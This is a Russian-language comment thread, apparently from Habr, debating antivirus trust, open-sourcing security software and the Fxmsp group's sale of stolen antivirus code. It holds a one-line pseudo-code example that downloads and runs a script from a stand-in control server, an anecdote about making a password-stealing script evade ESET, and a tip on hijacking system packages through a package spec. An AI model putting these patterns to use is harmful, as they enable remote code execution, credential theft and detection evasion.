Information Security
Open source
Antivirus protection
Software
Comments 34
0
В связи с надвигающимся полным опенсорсом — исходники антивирусов обязательно должны быть открыты, чтобы их перестали подозревать в троянизме.
-1
Открытые(и даже проверенные спецслужбами) исходники — не гарант безопасности, как показывает опыт Касперского. Никто не мешает написать антивирус вида
int main(void) {
run(download_script("http://mycontrolserv.io"));
return 0;
}
0
А статический анализ на что? Вопросы к личности проверяющего.
+1
Статический анализ в моем коде выше не покажет ничего противозаконного.
Я к тому, что в любом мало-мальски большом антивирусе есть функция «выполнить код на удаленной машине».
+4
Вы неверно выразились. Не «никто не мешает», а «большинство антивирусов так и написаны».

Работа со сложными вирусами (детектирование, лечение) — по сути, исполняемые скрипты, и тут нельзя по-другому. А эти скрипты скачиваются с обновлениями баз. И запретить обновления нельзя — какой толк от антивируса без обновлений. Можно вручную проверять каждое обновление (и требовать исходники баз в человеко-читаемом виде), но это уже другая история.
0
проверять каждое обновление

Ну теоретически обновления для версий, сертифицированных под ФСБ, такие и есть
+1
Ну так себе идея. Невзирая на зашкварность прнципа security via obscurity, антивирусы — это игра в кошки-мышки, и именно здесь он может работать. И давая возможность разработчикам вирусни читать исходники антивирусов, надо прикладывать на порядки больше усилий, чтобы антивирус все равно продолжил работать
+5
Аргумент понятен, но если его развить, получится, что и тексты законов нужно держать в секрете — ведь если жулик прочитает закон, он всегда найдет способ его обойти!
+11

Закон то как раз известен. Продолжая вашу логику, следует выложить в открытый доступ информацию о том, от каких информаторов ФСБ узнаёт о готовящихся терактах. Предлагаю не доводить логику до крайностей, и остановиться на золотой середине, которая более-менее эфективна.

0
исходники антивирусов обязательно должны быть открыты, чтобы их перестали подозревать в троянизме.

А почему это не касается любого другого софта, что вы устанавливаете на свой компьютер?
+5

Смотря где. В Виндоуз, действительно, есть практика использования "портабельных" приложений, но в Линукс типично установка производится только из-под рута. Возьмите сторонние пакеты популярных коммерческих приложений, например: skype, slack, vs code. Их дебиан-пакеты при установке прописывают в систему свой ключ и свой репозиторий. Это значит, что с этого момента компании могут обновить любой файл в вашей системе, например, они могут "обновить" вам sshd, firefox, bash или любую другую стандартную программу. Более того, slack еще и прописывает в крон скрипт, который проверяет ежесуточно, что их репозиторий в /etc/apt/source.list.d/ не закомментирован, и раскомментирует его в этом случае обратно (по комментариям в коде, это делается на случай обновления дистрибутива).


Потому в Линукс, если вы ставите что-то стороннее, коммерческое, проприетарное, из-под рута, вы по сути даете компании полный рутовый доступ в вашу систему. То же касается докеров и прочих популярных сторонних утилит.

0
Это понятно, негодяев хватает, но как VSCode может обновить мой bash, если в ключе написано «Майкрософт», который не является поставщиком системы? Вы ничего не путаете?
+2
Ну чисто теоретически они могут выпустить обновление своего vscode, где заодно «обновлят» bash. На самом деле пакетный менеджер укажет вам о конфликте и не даст поступить так нагло.

Но это легко обходится добавлением новой задачи/правила в systemd, crond, udevd и еще много куда.
0

Если речь о стороннем репозитории, то можно просто положить в него пакет bash версии 9999 и Линукс радостно на него "обновится". Такие случаи регулярно происходят и без злого умысла.

+3
Каком ключе? Ключ только позволяет убедится что MITM не было, никакой подписи бинарей нет (как минимум в pacman/yum(dnf)/apt). Ставят Obsoletes: Bash в своем spec-file (PKGBUILD, whatever) и понеслась.
+4
Вы можете отказаться разрешать им прописывать свой репозиторий. Это делается только для своевременности обновлений. Без репозитория они всё равно продолжат работать.
Умея пользоваться менеджером пакетов на уровне выше чайника, можно установить пакет в chroot и пусть он там обновляется как хочет.
Но главное, что все эти системы пакетов — предназначены для доверенного софта. Для недоверенного их использование давно устарело. Используя Flatpak вы можете установить любое из перечисленных приложений, полностью отобрать у него доступ к системе даже на чтение (перед первым запуском, к тому же), и оно всё равно продолжит работать и обновлятся.
По сранению с этим, в Windows большиство приложений вы не сможете запустить, не запустив перед этим от рута его инсталлятор. Никакие Sandbox в Windows не могут Sandbox-ить инсталлятор, потому что в формате MSI сам инсталлятор не делает процедуры, вместо этого делегируя их системному процессу.
0

Какую кнопку надо нажать, чтобы отказаться им разрешать обновления? Это надо вручную после установки .deb удалять крон-скрипты и файл в /etc/apt/sources.list.d/, причем при переустановке или перепроверке он прилетит обратно.


В Линуксе пока все плохо с установкой стороннего ПО: она там просто-напросто не предусмотрена, потому и делают такие костыли, как самовольное добавление себя в конфиг apt. Я знаю, что там делают appimage, snapcraft и flatpack, но они, конечно, поздновато спохватились: Линукс уже более 20 лет существует, а средства для распространения приложений только-только начинают делать. Но, конечно, хорошо, что вообще делают.


Умея пользоваться менеджером пакетов на уровне выше чайника, можно установить пакет в chroot и пусть он там обновляется как хочет.

Для этого придется заморочиться с разными конфигами, писать свои скрипты, это не штатная возможность.


По сранению с этим, в Windows большиство приложений вы не сможете запустить, не запустив перед этим от рута его инсталлятор.

В Windows есть портабельные приложения в виде архивов, и часто установщик можно распаковать, а изоляцию бедного человека можно реализовать, запуская приложение из-под отдельного пользователя (при этом ломается драг-н-дроп, права на файлы и тд).

+1

dpkg -i --force-not-root --root=/path/to/temp package.deb
Установить в промежуточную папку, удалить всё ненужное, всё остальное копировать в систему. К сожалению, напрямую из промежуточной папки оно не заработает, потому что всем плевать и они пишут абсолютные пути к ресурсам. При обновлении оно не слетит, потому что само оно не обновится.
Портабельные приложения существуют, но они почти всегда пиратские. А мы же с вами белые и пушистые.

+1
У этого подхода ведь есть и обратная сторона медали. С одной стороны, опенсурс позволяет всем желающим провести аудит кода, найти и устранить уязвимости. С другой стороны, опенсурс также позволяет всем желающим найти уязвимости, и никому про это не сказать, а продолжать их использовать в своих целях. И в случае антивируса, я не могу быть уверенным, что волонтеры будут удачливее, чем злоумышленники, особенно учитывая тот факт, что в отличии от проектов уровня ядра Линукса группа первых будет сравнительно невелика, а группа вторых ничуть не меньше, и весьма мотивирована.
0
Согласен. Да и про скрипты товарищи выше объяснили, я сам что-то не подумал…
+10

Эта статья — неплохая реклама хакерской группы. Написана по всем канонам. У меня, как у читателя, появилось чувство доверия и уважения к этому коллективу.

+1
«с большой уверенностью оценивают, что Fxmsp является надёжным хакерским коллективом, который имеет историю продажи поддающихся проверке корпоративных взломов, на которых они заработали около $1 млн».


Это же годы. Для коллектива и на годы, да еще плюс комиссии большие за анонимную обналичку/выведение денег — это очень мало.
0
Наверняка коллектив зарабатывает не только на таких продажах, это скорее для маркетинговая поддержка основных проектов.
+4

Кто прочитал этот шлак до конца — скажите, конкретные антивирусы были названы? Или это вода ради воды?

0
Скорее всего одна из трех компаний — Симантик. А вот другие… Ну нет еще двух известных американских компаний. Каспер — вряд-ли, так как вроде русский хакал. Есет топовая компания, но не американская. Тренды тоже не американские. Макафи? Но кто тогда третий?
+1
Прямо не сказано, но из текста можно понять, что взломщики намеренно не раскрывают наименования продуктов.
0
Какая-нибудь Panda… Не в обиду компании, но году в 2015 я подписал заведомый вирус (Conficker, он же Kido, она же Элла Кацнельбоген, она же Людмила Огуренкова, она же Изольда Меньшова, она же Валентина Панеяд), который детектировался «Пандой» по сигнатуре, просроченной и отозванной цифровой подписью. И чудо — файл перестал определяться, хотя любой нормальный продукт должен приравнивать отозванную подпись, как минимум, к отсутствию подписи.
0

Я написал скрипт, который просто берёт из браузера историю и пароли и отправляет их на сервер, а затем самоудаляется. ESET заворчал. Я удалил из скрипта самоудаление. У ESET пропали все претензии.

0
На подпольных форумах Fxmsp также прокомментировала возможности программного обеспечения различных компаний и оценила их эффективность.

Самое интересное не опубликовали!
Only those users with full accounts are able to leave comments. , please.